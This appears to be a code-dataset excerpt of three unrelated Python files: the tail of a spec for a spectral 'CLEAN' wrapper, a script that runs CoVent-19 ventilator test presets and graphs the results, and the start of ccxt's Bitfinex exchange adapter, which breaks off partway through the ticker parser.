        self.distance_vector = np.load("./spec/fixtures/unit/distance_vector_1.pickle")
    with before.each:
        self.wrapper = wrp.Wrapper(self.time_grid, self.values)
    with description('__init__'):
        with it('sets correct values'):
            expect(self.wrapper._Wrapper__time_grid).to(equal_ndarray(self.time_grid))
            expect(self.wrapper._Wrapper__values).to(equal_ndarray(self.values))
            expect(self.wrapper._Wrapper__distance_vector).to(equal_ndarray(self.distance_vector))
    # reusable example: checks __estimate_max_freq against self.expected_max_freq
    with shared_context('#__estimate_max_freq checker'):
        with description('#__estimate_max_freq'):
            with before.all:
                self.time_grid = np.array(
                    [0.0, 5.0, 6.0, 9.0, 20.0]
                ).reshape((-1, 1))
            with it('returns max freq estimated by minimum time distance'):
                expect(self.wrapper._Wrapper__estimate_max_freq(self.use_aver)).to(
                    equal(self.expected_max_freq)
                )
    with description('use_aver is False'):
        with before.all:
            self.use_aver = False
            self.expected_max_freq = 0.5
        with included_context('#__estimate_max_freq checker'):
            pass
    with description('use_aver is True'):
        with before.all:
            self.use_aver = True
            self.expected_max_freq = 0.1
        with included_context('#__estimate_max_freq checker'):
            pass
    with description('#__calculate_estimations_vector_size'):
        with before.all:
            self.use_aver = False
            self.time_grid = np.array([0.0, 3.5]).reshape((-1, 1))
        with it('calculates correct value'):
            max_freq = 0.8
            khi = 4
            expected_num_of_freq_estimations = 12
            expect(self.wrapper._Wrapper__calculate_estimations_vector_size(max_freq, khi)).to(
                equal(expected_num_of_freq_estimations)
            )
    with description('clean'):
        with before.all:
            self.expected_keys = [
                'iterations', 'freq_vector', 'uniform_time_grid',
                'clean_spectrum', 'correlogram', 'uniform_series',
                'frequencies', 'amplitudes', 'phases'
            ]
            self.expected_keys_arr = [
                'freq_vector', 'uniform_time_grid',
                'clean_spectrum', 'correlogram', 'uniform_series',
                'frequencies', 'amplitudes', 'phases'
            ]
        with before.each:
            self.result = self.wrapper.clean(
                self.detection_treshold, self.max_iterations, self.harmonic_share, self.khi, self.use_aver
            )
        # reusable example set comparing clean() output against fixtures
        with shared_context('iteratoins result checker'):
            with it('returns dict with correct keys'):
                expect(self.result).to(have_only_keys(*self.expected_keys))
            with it('returns correct number of iterations'):
                expect(self.result['iterations']).to(equal(self.expected_iterations))
            with it('returns correct values and does not contain zeroes'):
                for key in self.expected_keys_arr:
                    expect(
                        self.result[key]
                    ).to(contain_non_zero_vals(self.round_precision))
                    expect(
                        self.result[key]
                    ).to(equal_ndarray(getattr(self, key), self.round_precision))
        with description('use_aver is False'):
            with before.all:
                self.use_aver = False
                self.expected_iterations = 4
                self.uniform_time_grid = np.load("./spec/fixtures/unit/uniform_time_grid_1.pickle")
                self.freq_vector = np.load("./spec/fixtures/unit/freq_vector_1.pickle")
                self.clean_spectrum = np.load("./spec/fixtures/unit/clean_spectrum_1.pickle")
                self.correlogram = np.load("./spec/fixtures/unit/correlogram_1.pickle")
                self.uniform_series = np.load("./spec/fixtures/unit/uniform_series_1.pickle")
                self.frequencies = np.load("./spec/fixtures/unit/frequencies_1.pickle")
                self.amplitudes = np.load("./spec/fixtures/unit/amplitudes_1.pickle")
                self.phases = np.load("./spec/fixtures/unit/phases_1.pickle")
            with included_context('iteratoins result checker'):
                pass
        with description('use_aver is True'):
            with before.all:
                self.use_aver = True
                self.expected_iterations = 4
                self.uniform_time_grid = np.load("./spec/fixtures/unit/uniform_time_grid_2.pickle")
                self.freq_vector = np.load("./spec/fixtures/unit/freq_vector_2.pickle")
                self.clean_spectrum = np.load("./spec/fixtures/unit/clean_spectrum_2.pickle")
                self.correlogram = np.load("./spec/fixtures/unit/correlogram_2.pickle")
                self.uniform_series = np.load("./spec/fixtures/unit/uniform_series_2.pickle")
                self.frequencies = np.load("./spec/fixtures/unit/frequencies_2.pickle")
                self.amplitudes = np.load("./spec/fixtures/unit/amplitudes_2.pickle")
                self.phases = np.load("./spec/fixtures/unit/phases_2.pickle")
            with included_context('iteratoins result checker'):
                pass
82de6fe2d00868a8647723b5969818dda0271144 | 6,235 | py | Python | software/utils/run_covent_tests.py | dheater/Ventilator | f10c03805f8907683ee91e1da0fd82088b028563 | [
"Apache-2.0"
] | null | null | null | software/utils/run_covent_tests.py | dheater/Ventilator | f10c03805f8907683ee91e1da0fd82088b028563 | [
"Apache-2.0"
] | null | null | null | software/utils/run_covent_tests.py | dheater/Ventilator | f10c03805f8907683ee91e1da0fd82088b028563 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
"""
Wrapper around controller_debug.py that runs all of the covent tests in a row
and packages them into a standard, sharable format.
"""
from datetime import date
from pathlib import Path
import argparse
import atexit
import math
import os
import subprocess
import time
import sys
import shlex
# All eight CoVent-19 pressure-control test presets, run in order by default.
PRESETS = [f"covent_pc_{i}" for i in range(1, 9)]
# Covent tests come in two flavors, ones which are meant to run at 30%
# fio2, and ones which are meant to run at 90%.
HIGH_OX_TESTS = {f"covent_pc_{i}" for i in [2, 3, 6, 7]}
# controller_debug.py lives next to this script; it is invoked as a subprocess.
DBG_SCRIPT = Path(__file__).absolute().parent.joinpath("controller_debug.py")
def run_test(test, cmd_args):
    """Run one covent preset on the ventilator and save a graph of the trace.

    Sends an ordered sequence of debug commands to the controller via
    controller_debug.py: configure fio2, spin up the fan with the circuit
    disconnected, load the preset, start ventilating, capture a trace, and
    render it to <dest>/<test>.dat(.png).
    """
    # helper: one controller_debug.py invocation with a single command string
    def run(args):
        subprocess.check_call(
            [sys.executable, DBG_SCRIPT, "--port", cmd_args.port, "-c", args]
        )
    outfile = cmd_args.dest.joinpath(f"{test}.dat")
    # Tell the controller whether to generate pressure using the fan or the
    # high-pressure oxygen source.
    #
    # TODO: Although these tests are meant to run at 30%/90% fio2, we currently
    # can't mix air and oxygen, so we run them at 21% and 100%.
    if cmd_args.oxygen == "on" or (cmd_args.oxygen == "auto" and test in HIGH_OX_TESTS):
        run("set gui_fio2 100")
    else:
        run("set gui_fio2 21")
    # Ensure the ventilator fan is on, and disconnect the fan from the system
    # so it's not inflating the test lung. Edwin's request is that the fan
    # doesn't have to spin up during these tests.
    run("set forced_exhale_valve_pos 1")
    run("set forced_blower_valve_pos 0")
    run("set forced_blower_power 1")
    run("set gui_mode 0")
    # Switch to this preset.
    run(f"preset {test}")
    # Give the user a chance to adjust the test lung.
    if not cmd_args.nointeractive:
        input(
            "Adjust test lung per above, then press enter. "
            "(Skip this with --nointeractive.)"
        )
    # Unforce parameters we set above so they can be controlled by the
    # controller.  Note that we unforce the blower power *after* setting the
    # gui_mode to 1 because if we unforced it while we were still in mode 0
    # (i.e. "ventilator off"), the fan would momentarily spin down.
    run("set forced_exhale_valve_pos -1")
    run("set forced_blower_valve_pos -1")
    run("set gui_mode 1")
    run("set forced_blower_power -1")
    # let the system settle before recording
    time.sleep(cmd_args.ignore_secs)
    run(f"trace start pc_setpoint pressure volume net_flow")
    time.sleep(cmd_args.capture_secs)
    # Graphing flow at any scale is noisy and overwhelms the rest of the chart.
    # trace graph can't currently exclude fields, so as a hack, graph flow
    # divided by a large number, essentially zeroing it out.
    run(
        f"trace graph --dest={shlex.quote(str(outfile))} --title={test} "
        "--nointeractive --scale=volume/10 --scale=net_flow/1e9"
    )
def concat_images(cmd_args):
    """Stitch all per-test PNGs in cmd_args.dest into one combined.png.

    Does nothing if Pillow is unavailable or no images were produced.
    """
    # It's more compact to show two images per row, but then visually you are
    # tempted to assume the Y axes are the same in each row, which is not true.
    IMAGES_PER_ROW = 1
    try:
        from PIL import Image
    except ImportError:
        print("pip install pillow to get a single image of all the test results.")
        return
    images = [Image.open(p) for p in sorted(cmd_args.dest.glob("*.png"))]
    if not images:
        # nothing to combine (e.g. every test failed before graphing);
        # max() below would raise ValueError on an empty sequence
        return
    max_width = max(img.width for img in images)
    max_height = max(img.height for img in images)
    combined_width = min(IMAGES_PER_ROW, len(images)) * max_width
    combined_height = math.ceil(len(images) / IMAGES_PER_ROW) * max_height
    combined = Image.new(
        "RGB", (combined_width, combined_height), color=(255, 255, 255)
    )
    for i, img in enumerate(images):
        xidx = i % IMAGES_PER_ROW
        yidx = i // IMAGES_PER_ROW
        combined.paste(img, (xidx * max_width, yidx * max_height))
    combined.save(cmd_args.dest.joinpath("combined.png"))
def choose_dest_dir():
    """Pick the next unused covent-tests-<date>-run-NNN directory name."""
    prefix = f"covent-tests-{date.today().isoformat()}-run-"
    existing = sorted(Path(".").glob(prefix + "[0-9][0-9][0-9]"))
    # continue the numbering after today's highest existing run, if any
    run_number = int(str(existing[-1])[-3:]) + 1 if existing else 0
    return f"{prefix}{run_number:03d}"
def main():
    """Parse arguments, run the selected covent tests, and combine results.

    Registers an atexit hook so the ventilator is switched off even when the
    script exits abnormally (e.g. ctrl+c).
    """
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "--port",
        help="port device is connected to (default: try to auto-detect the port)",
    )
    parser.add_argument(
        "--tests",
        help="comma-separated list of test numbers to run "
        "(default: run all covent tests)",
    )
    parser.add_argument(
        "--oxygen",
        choices=["off", "auto", "on"],
        default="off",
        help="Deliver air from the blower (off), from the pressurized oxygen "
        "source (on), or according to the particular test (auto).",
    )
    parser.add_argument(
        "--ignore-secs",
        help="Ignore this many seconds of data before starting to capture.",
        default=10,
        type=int,
    )
    parser.add_argument(
        "--capture-secs",
        help="Capture this many seconds of data from each test.",
        default=20,
        type=int,
    )
    parser.add_argument("--dest", help="Output directory (must not exist)")
    parser.add_argument(
        "--nointeractive",
        help="Run without prompting the user to e.g. change lung compliance",
    )
    args = parser.parse_args()
    if not args.port:
        # ask controller_debug.py to find the device for us
        args.port = (
            subprocess.check_output(
                [sys.executable, DBG_SCRIPT, "--detect-port-and-quit"]
            )
            .decode("utf-8")
            .strip()
        )
    if not args.dest:
        args.dest = choose_dest_dir()
        print(f"Writing output to {args.dest}")
    args.dest = Path(args.dest)
    if args.tests:
        tests = [f"covent_pc_{i}" for i in args.tests.split(",")]
    else:
        tests = PRESETS
    # Stop ventilating if this script exits abnormally, e.g. due to ctrl+c.
    def stop_ventilation():
        subprocess.check_call(
            [sys.executable, DBG_SCRIPT, "--port", args.port, "-c", "set gui_mode 0"]
        )
    atexit.register(stop_ventilation)
    args.dest.mkdir(exist_ok=False)
    # (original used enumerate() but never used the index)
    for t in tests:
        run_test(t, args)
    concat_images(args)
# Script entry point; allows importing this module without side effects.
if __name__ == "__main__":
    main()
| 31.489899 | 88 | 0.636568 |
d1407978d93c3aa875c8f532333b9189b1020197 | 48,603 | py | Python | python/ccxt/bitfinex.py | machenjie/ccxt | fb18393cdf893dba62eab7838040fb9cec7f10fd | [
"MIT"
] | 1 | 2021-07-07T14:56:56.000Z | 2021-07-07T14:56:56.000Z | python/ccxt/bitfinex.py | machenjie/ccxt | fb18393cdf893dba62eab7838040fb9cec7f10fd | [
"MIT"
] | 1 | 2022-03-05T13:29:47.000Z | 2022-03-05T15:00:38.000Z | python/ccxt/bitfinex.py | machenjie/ccxt | fb18393cdf893dba62eab7838040fb9cec7f10fd | [
"MIT"
] | 1 | 2021-11-30T11:30:35.000Z | 2021-11-30T11:30:35.000Z | # -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.base.exchange import Exchange
import hashlib
import math
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import AuthenticationError
from ccxt.base.errors import PermissionDenied
from ccxt.base.errors import ArgumentsRequired
from ccxt.base.errors import BadSymbol
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import OrderNotFound
from ccxt.base.errors import NotSupported
from ccxt.base.errors import RateLimitExceeded
from ccxt.base.errors import ExchangeNotAvailable
from ccxt.base.errors import InvalidNonce
from ccxt.base.decimal_to_precision import ROUND
from ccxt.base.decimal_to_precision import TRUNCATE
from ccxt.base.decimal_to_precision import DECIMAL_PLACES
from ccxt.base.decimal_to_precision import SIGNIFICANT_DIGITS
class bitfinex(Exchange):
def describe(self):
return self.deep_extend(super(bitfinex, self).describe(), {
'id': 'bitfinex',
'name': 'Bitfinex',
'countries': ['VG'],
'version': 'v1',
'rateLimit': 1500,
'certified': True,
'pro': True,
# new metainfo interface
'has': {
'cancelAllOrders': True,
'cancelOrder': True,
'CORS': False,
'createDepositAddress': True,
'createOrder': True,
'deposit': True,
'editOrder': True,
'fetchBalance': True,
'fetchClosedOrders': True,
'fetchDepositAddress': True,
'fetchDeposits': False,
'fetchFundingFees': True,
'fetchMarkets': True,
'fetchMyTrades': True,
'fetchOHLCV': True,
'fetchOpenOrders': True,
'fetchOrder': True,
'fetchOrderBook': True,
'fetchTicker': True,
'fetchTickers': True,
'fetchTrades': True,
'fetchTradingFee': True,
'fetchTradingFees': True,
'fetchTransactions': True,
'fetchWithdrawals': False,
'withdraw': True,
},
'timeframes': {
'1m': '1m',
'5m': '5m',
'15m': '15m',
'30m': '30m',
'1h': '1h',
'3h': '3h',
'4h': '4h',
'6h': '6h',
'12h': '12h',
'1d': '1D',
'1w': '7D',
'2w': '14D',
'1M': '1M',
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/27766244-e328a50c-5ed2-11e7-947b-041416579bb3.jpg',
'api': {
'v2': 'https://api-pub.bitfinex.com', # https://github.com/ccxt/ccxt/issues/5109
'public': 'https://api.bitfinex.com',
'private': 'https://api.bitfinex.com',
},
'www': 'https://www.bitfinex.com',
'referral': 'https://www.bitfinex.com/?refcode=P61eYxFL',
'doc': [
'https://docs.bitfinex.com/v1/docs',
'https://github.com/bitfinexcom/bitfinex-api-node',
],
},
'api': {
# v2 symbol ids require a 't' prefix
# just the public part of it(use bitfinex2 for everything else)
'v2': {
'get': [
'platform/status',
'tickers',
'ticker/{symbol}',
'trades/{symbol}/hist',
'book/{symbol}/{precision}',
'book/{symbol}/P0',
'book/{symbol}/P1',
'book/{symbol}/P2',
'book/{symbol}/P3',
'book/{symbol}/R0',
'stats1/{key}:{size}:{symbol}:{side}/{section}',
'stats1/{key}:{size}:{symbol}/{section}',
'stats1/{key}:{size}:{symbol}:long/last',
'stats1/{key}:{size}:{symbol}:long/hist',
'stats1/{key}:{size}:{symbol}:short/last',
'stats1/{key}:{size}:{symbol}:short/hist',
'candles/trade:{timeframe}:{symbol}/{section}',
'candles/trade:{timeframe}:{symbol}/last',
'candles/trade:{timeframe}:{symbol}/hist',
],
},
'public': {
'get': [
'book/{symbol}',
# 'candles/{symbol}',
'lendbook/{currency}',
'lends/{currency}',
'pubticker/{symbol}',
'stats/{symbol}',
'symbols',
'symbols_details',
'tickers',
'trades/{symbol}',
],
},
'private': {
'post': [
'account_fees',
'account_infos',
'balances',
'basket_manage',
'credits',
'deposit/new',
'funding/close',
'history',
'history/movements',
'key_info',
'margin_infos',
'mytrades',
'mytrades_funding',
'offer/cancel',
'offer/new',
'offer/status',
'offers',
'offers/hist',
'order/cancel',
'order/cancel/all',
'order/cancel/multi',
'order/cancel/replace',
'order/new',
'order/new/multi',
'order/status',
'orders',
'orders/hist',
'position/claim',
'position/close',
'positions',
'summary',
'taken_funds',
'total_taken_funds',
'transfer',
'unused_taken_funds',
'withdraw',
],
},
},
'fees': {
'trading': {
'tierBased': True,
'percentage': True,
'maker': 0.1 / 100,
'taker': 0.2 / 100,
'tiers': {
'taker': [
[0, 0.2 / 100],
[500000, 0.2 / 100],
[1000000, 0.2 / 100],
[2500000, 0.2 / 100],
[5000000, 0.2 / 100],
[7500000, 0.2 / 100],
[10000000, 0.18 / 100],
[15000000, 0.16 / 100],
[20000000, 0.14 / 100],
[25000000, 0.12 / 100],
[30000000, 0.1 / 100],
],
'maker': [
[0, 0.1 / 100],
[500000, 0.08 / 100],
[1000000, 0.06 / 100],
[2500000, 0.04 / 100],
[5000000, 0.02 / 100],
[7500000, 0],
[10000000, 0],
[15000000, 0],
[20000000, 0],
[25000000, 0],
[30000000, 0],
],
},
},
'funding': {
'tierBased': False, # True for tier-based/progressive
'percentage': False, # fixed commission
# Actually deposit fees are free for larger deposits(> $1000 USD equivalent)
# these values below are deprecated, we should not hardcode fees and limits anymore
# to be reimplemented with bitfinex funding fees from their API or web endpoints
'deposit': {
'BTC': 0.0004,
'IOTA': 0.5,
'ETH': 0.0027,
'BCH': 0.0001,
'LTC': 0.001,
'EOS': 0.24279,
'XMR': 0.04,
'SAN': 0.99269,
'DASH': 0.01,
'ETC': 0.01,
'XRP': 0.02,
'YYW': 16.915,
'NEO': 0,
'ZEC': 0.001,
'BTG': 0,
'OMG': 0.14026,
'DATA': 20.773,
'QASH': 1.9858,
'ETP': 0.01,
'QTUM': 0.01,
'EDO': 0.95001,
'AVT': 1.3045,
'USDT': 0,
'TRX': 28.184,
'ZRX': 1.9947,
'RCN': 10.793,
'TNB': 31.915,
'SNT': 14.976,
'RLC': 1.414,
'GNT': 5.8952,
'SPK': 10.893,
'REP': 0.041168,
'BAT': 6.1546,
'ELF': 1.8753,
'FUN': 32.336,
'SNG': 18.622,
'AID': 8.08,
'MNA': 16.617,
'NEC': 1.6504,
'XTZ': 0.2,
},
'withdraw': {
'BTC': 0.0004,
'IOTA': 0.5,
'ETH': 0.0027,
'BCH': 0.0001,
'LTC': 0.001,
'EOS': 0.24279,
'XMR': 0.04,
'SAN': 0.99269,
'DASH': 0.01,
'ETC': 0.01,
'XRP': 0.02,
'YYW': 16.915,
'NEO': 0,
'ZEC': 0.001,
'BTG': 0,
'OMG': 0.14026,
'DATA': 20.773,
'QASH': 1.9858,
'ETP': 0.01,
'QTUM': 0.01,
'EDO': 0.95001,
'AVT': 1.3045,
'USDT': 20,
'TRX': 28.184,
'ZRX': 1.9947,
'RCN': 10.793,
'TNB': 31.915,
'SNT': 14.976,
'RLC': 1.414,
'GNT': 5.8952,
'SPK': 10.893,
'REP': 0.041168,
'BAT': 6.1546,
'ELF': 1.8753,
'FUN': 32.336,
'SNG': 18.622,
'AID': 8.08,
'MNA': 16.617,
'NEC': 1.6504,
'XTZ': 0.2,
},
},
},
# todo rewrite for https://api-pub.bitfinex.com//v2/conf/pub:map:tx:method
'commonCurrencies': {
'ABS': 'ABYSS',
'AIO': 'AION',
'ALG': 'ALGO', # https://github.com/ccxt/ccxt/issues/6034
'AMP': 'AMPL',
'ATM': 'ATMI',
'ATO': 'ATOM', # https://github.com/ccxt/ccxt/issues/5118
'BAB': 'BCH',
'CTX': 'CTXC',
'DAD': 'DADI',
'DAT': 'DATA',
'DSH': 'DASH',
'DRK': 'DRK',
# https://github.com/ccxt/ccxt/issues/7399
# https://coinmarketcap.com/currencies/pnetwork/
# https://en.cryptonomist.ch/blog/eidoo/the-edo-to-pnt-upgrade-what-you-need-to-know-updated/
'EDO': 'PNT',
'GSD': 'GUSD',
'HOT': 'Hydro Protocol',
'IOS': 'IOST',
'IOT': 'IOTA',
'IQX': 'IQ',
'MIT': 'MITH',
'MNA': 'MANA',
'NCA': 'NCASH',
'ORS': 'ORS Group', # conflict with Origin Sport #3230
'POY': 'POLY',
'QSH': 'QASH',
'QTM': 'QTUM',
'RBT': 'RBTC',
'SEE': 'SEER',
'SNG': 'SNGLS',
'SPK': 'SPANK',
'STJ': 'STORJ',
'TRI': 'TRIO',
'TSD': 'TUSD',
'YYW': 'YOYOW',
'UDC': 'USDC',
'UST': 'USDT',
'UTN': 'UTNP',
'VSY': 'VSYS',
'WAX': 'WAXP',
'XCH': 'XCHF',
'ZBT': 'ZB',
},
'exceptions': {
'exact': {
'temporarily_unavailable': ExchangeNotAvailable, # Sorry, the service is temporarily unavailable. See https://www.bitfinex.com/ for more info.
'Order could not be cancelled.': OrderNotFound, # non-existent order
'No such order found.': OrderNotFound, # ?
'Order price must be positive.': InvalidOrder, # on price <= 0
'Could not find a key matching the given X-BFX-APIKEY.': AuthenticationError,
'Key price should be a decimal number, e.g. "123.456"': InvalidOrder, # on isNaN(price)
'Key amount should be a decimal number, e.g. "123.456"': InvalidOrder, # on isNaN(amount)
'ERR_RATE_LIMIT': RateLimitExceeded,
'Ratelimit': RateLimitExceeded,
'Nonce is too small.': InvalidNonce,
'No summary found.': ExchangeError, # fetchTradingFees(summary) endpoint can give self vague error message
'Cannot evaluate your available balance, please try again': ExchangeNotAvailable,
'Unknown symbol': BadSymbol,
},
'broad': {
'Invalid X-BFX-SIGNATURE': AuthenticationError,
'This API key does not have permission': PermissionDenied, # authenticated but not authorized
'not enough exchange balance for ': InsufficientFunds, # when buying cost is greater than the available quote currency
'minimum size for ': InvalidOrder, # when amount below limits.amount.min
'Invalid order': InvalidOrder, # ?
'The available balance is only': InsufficientFunds, # {"status":"error","message":"Cannot withdraw 1.0027 ETH from your exchange wallet. The available balance is only 0.0 ETH. If you have limit orders, open positions, unused or active margin funding, self will decrease your available balance. To increase it, you can cancel limit orders or reduce/close your positions.","withdrawal_id":0,"fees":"0.0027"}
},
},
'precisionMode': SIGNIFICANT_DIGITS,
'options': {
'currencyNames': {
'AGI': 'agi',
'AID': 'aid',
'AIO': 'aio',
'ANT': 'ant',
'AVT': 'aventus', # #1811
'BAT': 'bat',
# https://github.com/ccxt/ccxt/issues/5833
'BCH': 'bab', # undocumented
# 'BCH': 'bcash', # undocumented
'BCI': 'bci',
'BFT': 'bft',
'BSV': 'bsv',
'BTC': 'bitcoin',
'BTG': 'bgold',
'CFI': 'cfi',
'COMP': 'comp',
'DAI': 'dai',
'DADI': 'dad',
'DASH': 'dash',
'DATA': 'datacoin',
'DTH': 'dth',
'EDO': 'eidoo', # #1811
'ELF': 'elf',
'EOS': 'eos',
'ETC': 'ethereumc',
'ETH': 'ethereum',
'ETP': 'metaverse',
'FUN': 'fun',
'GNT': 'golem',
'IOST': 'ios',
'IOTA': 'iota',
# https://github.com/ccxt/ccxt/issues/5833
'LEO': 'let', # ETH chain
# 'LEO': 'les', # EOS chain
'LINK': 'link',
'LRC': 'lrc',
'LTC': 'litecoin',
'LYM': 'lym',
'MANA': 'mna',
'MIT': 'mit',
'MKR': 'mkr',
'MTN': 'mtn',
'NEO': 'neo',
'ODE': 'ode',
'OMG': 'omisego',
'OMNI': 'mastercoin',
'QASH': 'qash',
'QTUM': 'qtum', # #1811
'RCN': 'rcn',
'RDN': 'rdn',
'REP': 'rep',
'REQ': 'req',
'RLC': 'rlc',
'SAN': 'santiment',
'SNGLS': 'sng',
'SNT': 'status',
'SPANK': 'spk',
'STORJ': 'stj',
'TNB': 'tnb',
'TRX': 'trx',
'TUSD': 'tsd',
'USD': 'wire',
'USDC': 'udc', # https://github.com/ccxt/ccxt/issues/5833
'UTK': 'utk',
'USDT': 'tetheruso', # Tether on Omni
# 'USDT': 'tetheruse', # Tether on ERC20
# 'USDT': 'tetherusl', # Tether on Liquid
# 'USDT': 'tetherusx', # Tether on Tron
# 'USDT': 'tetheruss', # Tether on EOS
'VEE': 'vee',
'WAX': 'wax',
'XLM': 'xlm',
'XMR': 'monero',
'XRP': 'ripple',
'XVG': 'xvg',
'YOYOW': 'yoyow',
'ZEC': 'zcash',
'ZRX': 'zrx',
'XTZ': 'xtz',
},
'orderTypes': {
'limit': 'exchange limit',
'market': 'exchange market',
},
},
})
def fetch_funding_fees(self, params={}):
self.load_markets()
response = self.privatePostAccountFees(params)
fees = response['withdraw']
withdraw = {}
ids = list(fees.keys())
for i in range(0, len(ids)):
id = ids[i]
code = self.safe_currency_code(id)
withdraw[code] = self.safe_float(fees, id)
return {
'info': response,
'withdraw': withdraw,
'deposit': withdraw, # only for deposits of less than $1000
}
def fetch_trading_fees(self, params={}):
self.load_markets()
response = self.privatePostSummary(params)
#
# {
# time: '2019-02-20T15:50:19.152000Z',
# trade_vol_30d: [
# {
# curr: 'Total(USD)',
# vol: 0,
# vol_maker: 0,
# vol_BFX: 0,
# vol_BFX_maker: 0,
# vol_ETHFX: 0,
# vol_ETHFX_maker: 0
# }
# ],
# fees_funding_30d: {},
# fees_funding_total_30d: 0,
# fees_trading_30d: {},
# fees_trading_total_30d: 0,
# maker_fee: 0.001,
# taker_fee: 0.002
# }
#
return {
'info': response,
'maker': self.safe_float(response, 'maker_fee'),
'taker': self.safe_float(response, 'taker_fee'),
}
    def fetch_markets(self, params={}):
        """Build the unified market list from the v1 /symbols and /symbols_details endpoints.

        Only pairs present in both endpoint responses are kept.
        """
        ids = self.publicGetSymbols()
        details = self.publicGetSymbolsDetails()
        result = []
        for i in range(0, len(details)):
            market = details[i]
            id = self.safe_string(market, 'pair')
            if not self.in_array(id, ids):
                continue
            id = id.upper()
            baseId = None
            quoteId = None
            # longer ids use a 'BASE:QUOTE' separator; otherwise the first
            # 3 characters are the base and the next 3 the quote
            if id.find(':') >= 0:
                parts = id.split(':')
                baseId = parts[0]
                quoteId = parts[1]
            else:
                baseId = id[0:3]
                quoteId = id[3:6]
            base = self.safe_currency_code(baseId)
            quote = self.safe_currency_code(quoteId)
            symbol = base + '/' + quote
            precision = {
                'price': self.safe_integer(market, 'price_precision'),
                # https://docs.bitfinex.com/docs/introduction#amount-precision
                # The amount field allows up to 8 decimals.
                # Anything exceeding that will be rounded to the 8th decimal.
                'amount': 8,
            }
            limits = {
                'amount': {
                    'min': self.safe_float(market, 'minimum_order_size'),
                    'max': self.safe_float(market, 'maximum_order_size'),
                },
                'price': {
                    'min': math.pow(10, -precision['price']),
                    'max': math.pow(10, precision['price']),
                },
            }
            # minimum cost follows from the minimum amount at the minimum price
            limits['cost'] = {
                'min': limits['amount']['min'] * limits['price']['min'],
                'max': None,
            }
            result.append({
                'id': id,
                'symbol': symbol,
                'base': base,
                'quote': quote,
                'baseId': baseId,
                'quoteId': quoteId,
                'active': True,
                'precision': precision,
                'limits': limits,
                'info': market,
            })
        return result
    def amount_to_precision(self, symbol, amount):
        """Truncate *amount* to the market's amount precision (8 decimal places)."""
        # https://docs.bitfinex.com/docs/introduction#amount-precision
        # The amount field allows up to 8 decimals.
        # Anything exceeding that will be rounded to the 8th decimal.
        return self.decimal_to_precision(amount, TRUNCATE, self.markets[symbol]['precision']['amount'], DECIMAL_PLACES)
    def price_to_precision(self, symbol, price):
        """Round *price* to the market's significant-digit precision, then cap at 8 decimals."""
        price = self.decimal_to_precision(price, ROUND, self.markets[symbol]['precision']['price'], self.precisionMode)
        # https://docs.bitfinex.com/docs/introduction#price-precision
        # The precision level of all trading prices is based on significant figures.
        # All pairs on Bitfinex use up to 5 significant digits and up to 8 decimals(e.g. 1.2345, 123.45, 1234.5, 0.00012345).
        # Prices submitted with a precision larger than 5 will be cut by the API.
        return self.decimal_to_precision(price, TRUNCATE, 8, DECIMAL_PLACES)
    def calculate_fee(self, symbol, type, side, amount, price, takerOrMaker='taker', params={}):
        """Compute the trading fee for an order.

        Sells pay the fee in the quote currency (rate * amount * price);
        buys pay it in the base currency (rate * amount).
        """
        market = self.markets[symbol]
        rate = market[takerOrMaker]
        cost = amount * rate
        key = 'quote'
        if side == 'sell':
            cost *= price
        else:
            key = 'base'
        code = market[key]
        currency = self.safe_value(self.currencies, code)
        if currency is not None:
            precision = self.safe_integer(currency, 'precision')
            if precision is not None:
                # round the fee cost to the fee currency's own precision when known
                cost = float(self.currency_to_precision(code, cost))
        return {
            'type': takerOrMaker,
            'currency': market[key],
            'rate': rate,
            'cost': cost,
        }
    def fetch_balance(self, params={}):
        """Fetch balances for one wallet type.

        The wallet is selected with params['type'] ('exchange' by default);
        both the raw bitfinex names (exchange/deposit/trading) and the
        unified names (exchange/funding/margin) are accepted.
        """
        self.load_markets()
        # raw bitfinex wallet name -> unified wallet name
        types = {
            'exchange': 'exchange',
            'deposit': 'funding',
            'trading': 'margin',
        }
        balanceType = self.safe_string(params, 'type', 'exchange')
        query = self.omit(params, 'type')
        response = self.privatePostBalances(query)
        # sample response:
        # [{type: 'deposit',
        #     currency: 'btc',
        #     amount: '0.00116721',
        #     available: '0.00116721'},
        # {type: 'exchange',
        #     currency: 'ust',
        #     amount: '0.0000002',
        #     available: '0.0000002'},
        # {type: 'trading',
        #     currency: 'btc',
        #     amount: '0.0005',
        #     available: '0.0005'}],
        result = {'info': response}
        for i in range(0, len(response)):
            balance = response[i]
            type = self.safe_string(balance, 'type')
            parsedType = self.safe_string(types, type)
            if (parsedType == balanceType) or (type == balanceType):
                currencyId = self.safe_string(balance, 'currency')
                code = self.safe_currency_code(currencyId)
                # bitfinex had BCH previously, now it's BAB, but the old
                # BCH symbol is kept for backward-compatibility
                # we need a workaround here so that the old BCH balance
                # would not override the new BAB balance(BAB is unified to BCH)
                # https://github.com/ccxt/ccxt/issues/4989
                if not (code in result):
                    account = self.account()
                    account['free'] = self.safe_float(balance, 'available')
                    account['total'] = self.safe_float(balance, 'amount')
                    result[code] = account
        return self.parse_balance(result)
def fetch_order_book(self, symbol, limit=None, params={}):
self.load_markets()
request = {
'symbol': self.market_id(symbol),
}
if limit is not None:
request['limit_bids'] = limit
request['limit_asks'] = limit
response = self.publicGetBookSymbol(self.extend(request, params))
return self.parse_order_book(response, None, 'bids', 'asks', 'price', 'amount')
def fetch_tickers(self, symbols=None, params={}):
self.load_markets()
response = self.publicGetTickers(params)
result = {}
for i in range(0, len(response)):
ticker = self.parse_ticker(response[i])
symbol = ticker['symbol']
result[symbol] = ticker
return self.filter_by_array(result, 'symbol', symbols)
def fetch_ticker(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
ticker = self.publicGetPubtickerSymbol(self.extend(request, params))
return self.parse_ticker(ticker, market)
    def parse_ticker(self, ticker, market=None):
        """Convert a raw bitfinex ticker dict into the unified ticker structure."""
        # bitfinex timestamps are fractional seconds; convert to integer ms
        timestamp = self.safe_float(ticker, 'timestamp')
        if timestamp is not None:
            timestamp *= 1000
            timestamp = int(timestamp)
        symbol = None
